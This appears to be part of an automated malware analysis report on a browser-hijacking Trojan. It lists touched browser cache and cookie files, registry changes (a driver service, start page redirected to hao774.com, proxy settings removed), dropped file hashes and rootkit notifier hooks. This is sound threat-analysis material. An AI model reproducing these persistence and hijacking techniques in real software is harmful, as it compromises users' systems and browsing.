C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Windows\PHTQYMp\QPofTRsG.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Windows\PHTQYMp\WVqSMf.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A3D4372536C2A6CA26ECB4389B6AE73E3BED83A7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\3412 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Windows\PHTQYMp\oBIxFFT.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Windows\CLOG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Windows\ovhlpnij.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c (0 bytes)

Registry activity

The process adca3c78dafc4406e4d0862872e8236.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"ImagePath" = "\DosDevices\C:\Windows\system32\1428b5\CDClient_EX.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Devname" = "8Kx9nwShsniƢ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
"adca3c78dafc4406e4d0862872e8236.exe" = "9000"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao774.com/?90166-00003"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao774.com/?90166-00003"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"ErrorControl" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
cdfb49d4628f3822b2335c7a35bf69cd c:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\PHTQYMp\LNYxeOwQr.dll
948d63bef2e72217291dca9952a08d84 c:\Windows\PHTQYMp\QPofTRsG.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls loading of executable images into memory by installing the load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls operations on the system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

